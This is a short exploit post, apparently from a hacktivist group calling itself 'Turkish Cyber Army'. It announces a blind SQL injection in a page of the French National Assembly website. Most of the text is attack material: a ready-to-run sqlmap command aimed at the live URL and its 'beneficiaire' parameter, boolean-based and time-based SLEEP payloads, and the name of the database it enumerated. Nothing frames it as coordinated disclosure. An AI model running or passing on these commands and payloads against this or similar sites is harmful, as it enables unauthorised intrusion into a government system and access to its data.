[*]

# Exploit Title : National Assembly of France ( Fransa Ulusal Meclis ) Blind SQL İnjection
# Team : Sanal Türk Ordusu “Turkish Cyber Army”
# Date : 21/03/2020
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/

sqlmap -u http://www2.assemblee-nationale.fr/reserve_parlementaire/reserve_parlementaire_detail_json?beneficiaire=140763 –dbs –batch

Parameter: beneficiaire (GET)
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: beneficiaire=140763 AND 3879=3879

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: beneficiaire=140763 OR SLEEP(5)


available databases [1]:
[*] reserve_parlementaire




[*]
[*]Source link

You must be logged in to post a comment.